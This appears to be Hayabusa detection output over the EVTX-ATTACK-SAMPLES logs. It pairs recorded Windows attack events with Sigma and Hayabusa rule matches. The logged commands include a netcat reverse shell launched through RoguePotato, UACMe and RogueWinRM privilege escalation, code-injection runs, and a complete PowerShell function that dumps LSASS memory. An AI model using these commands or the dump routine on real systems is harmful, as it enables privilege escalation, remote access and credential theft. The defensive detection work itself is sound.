+2020-05-10 09:11:20.824 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.101:49683 (MSEDGEWIN10) | Dst: 192.168.56.1:139 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-12 08:21:56.493 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 | Process: C:\Users\IEUser\Tools\PrivEsc\RoguePotato.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e5 | PID: 4200 | PGUID: 747F3D96-DE14-5EB9-0000-0010BE064300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,Rogue Epmapper np detected - possible RoguePotato privesc | Pipe: \RoguePotato\pipe\epmapper | Process: c:\Users\IEUser\tools\PrivEsc\RoguePotato.exe | PID: 4200 | PGUID: 747F3D96-DE14-5EB9-0000-0010BE064300,../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,Rogue Epmapper np detected - possible RoguePotato privesc | Pipe: \RoguePotato\pipe\epmapper | Process: System | PID: 4 | PGUID: 747F3D96-545A-5EBA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:21:56.587 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe | Process: C:\Users\IEUser\Tools\Misc\nc64.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 | LID: 0x3e7 | PID: 4468 | PGUID: 747F3D96-DE14-5EB9-0000-00107C0F4300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:21:56.661 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe | LID: 0x3e7 | PID: 224 | PGUID: 747F3D96-DE14-5EB9-0000-001079154300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 5252 | PGUID: 747F3D96-DE32-5EB9-0000-00103FC14300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: Akagi.exe 58 c:\Windows\System32\cmd.exe | Process: C:\Users\IEUser\Tools\PrivEsc\Akagi.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89eef | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.183 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - Rogue Windir - UAC bypass prep | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir: C:\Users\IEUser\AppData\Local\Temp\DNeruK | Process: C:\Windows\explorer.exe | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.184 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe | Process: C:\Windows\explorer.exe | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.211 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 328 310 0000028A37652590 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6968 | PGUID: 747F3D96-BB89-5EBA-0000-0010FB4C3600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 | Process: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41} | LID: 0x89ebf | PID: 1088 | PGUID: 747F3D96-BB89-5EBA-0000-001042653600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.447 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 | LID: 0x89ebf | PID: 4688 | PGUID: 747F3D96-BB89-5EBA-0000-001019683600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 09:28:16.122 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay | LID: 0x3e7 | PID: 8052 | PGUID: 747F3D96-3F20-5EBB-0000-0010035E3600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
+2020-05-13 09:28:52.873 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3080 | PGUID: 747F3D96-3F44-5EBB-0000-001017813700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
+2020-05-13 09:28:52.914 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6344 | PGUID: 747F3D96-3F44-5EBB-0000-0010EA933700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
+2020-05-13 09:28:52.950 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation -p -s wcncsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6372 | PGUID: 747F3D96-3F44-5EBB-0000-0010D29A3700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
+2020-05-24 10:13:47.756 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: RogueWinRM.exe -p c:\Windows\System32\cmd.exe | Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e5 | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:48.864 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3044 | PGUID: 747F3D96-CA4C-5EC9-0000-001093D53700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:50.327 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: RogueWinRM.exe -p c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 1516 | PGUID: 747F3D96-CA4E-5EC9-0000-00109FE23700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:50.330 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49680 (MSEDGEWIN10) | Dst: 127.0.0.1:5985 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\svchost.exe | PID: 3044 | PGUID: 747F3D96-CA4C-5EC9-0000-001093D53700,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49680 (MSEDGEWIN10) | Dst: 127.0.0.1:5985 (MSEDGEWIN10) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 4456 | PGUID: 747F3D96-CA52-5EC9-0000-001027FA3700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,medium,,Potentially Malicious PwSh,"function Memory($path) { $Process = Get-Process lsass $DumpFilePath = $path $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') $Flags = [Reflection.BindingFlags] 'NonPublic, Static' $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) $MiniDumpWithFullMemory = [UInt32] 2 # $ProcessId = $Process.Id $ProcessName = $Process.Name $ProcessHandle = $Process.Handle $ProcessFileName = ""$($ProcessName).dmp"" $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, $ProcessId, $FileStream.SafeFileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)) $FileStream.Close() if (-not $Result) { $Exception = New-Object ComponentModel.Win32Exception $ExceptionMessage = ""$($Exception.Message) ($($ProcessName):$($ProcessId))"" # Remove any partially written dump files. For example, a partial dump will be written # in the case when 32-bit PowerShell tries to dump a 64-bit process. Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue throw $ExceptionMessage } else { ""Memdump complete!"" } }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx
+2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,info,,PwSh Scriptblock Log,"function Memory($path) { $Process = Get-Process lsass $DumpFilePath = $path $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') $Flags = [Reflection.BindingFlags] 'NonPublic, Static' $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) $MiniDumpWithFullMemory = [UInt32] 2 # $ProcessId = $Process.Id $ProcessName = $Process.Name $ProcessHandle = $Process.Handle $ProcessFileName = ""$($ProcessName).dmp"" $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, $ProcessId, $FileStream.SafeFileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)) $FileStream.Close() if (-not $Result) { $Exception = New-Object ComponentModel.Win32Exception $ExceptionMessage = ""$($Exception.Message) ($($ProcessName):$($ProcessId))"" # Remove any partially written dump files. For example, a partial dump will be written # in the case when 32-bit PowerShell tries to dump a 64-bit process. Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue throw $ExceptionMessage } else { ""Memdump complete!"" } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx
+2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,high,CredAccess,PowerShell Get-Process LSASS in ScriptBlock,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx
+2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,low,Evas,Use Remove-Item to Delete File,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_remove_item_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx
+2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,high,Exec,Accessing WinAPI in PowerShell,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx
+2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx
+2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,high,,Process Access_Sysmon Alert,Evasion Suspicious NtOpenProcess Call | Src Process: C:\Users\Public\za3bollo.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1972 | Src PGUID: 747F3D96-A591-5EFB-0000-00109FE4CC01 | Tgt PID: 2996 | Tgt PGUID: 747F3D96-59BB-5EFB-0000-0010D81B6400,../hayabusa-rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx
+2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,critical,Exec,Direct Syscall of NtOpenProcess,,../hayabusa-rules/sigma/process_access/sysmon_direct_syscall_ntopenprocess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx
+2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx
+2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: spooler.exe payload.bin | Process: C:\Users\Public\tools\cinj\spooler.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89c8f | PID: 6892 | PGUID: 747F3D96-1EA9-5EFE-0000-0010B1F13D00 | Hash: SHA1=68044D72A9FF02839E0164AEB8DFF1EB9B88A94B,MD5=508317C4844B1D2945713CC909D6431D,SHA256=0EB4AFA7216C4BC5E313ECA3EBAF0BD59B90EFF77A246AEF78491AA4FC619A17,IMPHASH=620745A90090718A46AC492610FE8EB4",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
+2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
+2020-07-03 02:51:37.822 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\conhost.exe | Tgt Process: c:\Users\Public\tools\cinj\spooler.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 640 | Src PGUID: 747F3D96-1E44-5EFE-0000-001060463700 | Tgt PID: 6892 | Tgt PGUID: 747F3D96-1EA9-5EFE-0000-0010B1F13D00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
+2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\spoolsv.exe | LID: 0x3e7 | PID: 3344 | PGUID: 747F3D96-1EA9-5EFE-0000-00102BF53D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
+2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\spoolsv.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 747F3D96-1CDA-5EFE-0000-0010E0780100 | Tgt PID: 3344 | Tgt PGUID: 747F3D96-1EA9-5EFE-0000-00102BF53D00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
+2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
+2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: chost.exe payload.bin | Process: C:\Users\Public\tools\evasion\chost.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\windows\system32\cmd.exe"" | LID: 0x37e846b4 | PID: 16900 | PGUID: 00247C92-20BD-5EFE-0000-00106D029D3A | Hash: SHA1=06A1D9CC580F1CC239E643302CAB9166E0DF6355,MD5=7724B90C1D66AB3FA2A781E344AD2BE5,SHA256=805CA4E5A08C2366923D46680FDFBAD8C3012AB6A93D518624C377FA8A610A43,IMPHASH=A4DE9CE85347166ACB42B7FA4676BF25",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
+2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
+2020-07-03 03:00:29.617 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\conhost.exe | Tgt Process: C:\Users\Public\tools\evasion\chost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 29168 | Src PGUID: 00247C92-1117-5EFE-0000-00105A024E3A | Tgt PID: 16900 | Tgt PGUID: 00247C92-20BD-5EFE-0000-00106D029D3A,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
+2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: \??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1 | LID: 0x37e846b4 | PID: 16788 | PGUID: 00247C92-20BD-5EFE-0000-00105C059D3A,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
+2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,medium,Evas,Conhost Parent Process Executions,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_conhost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
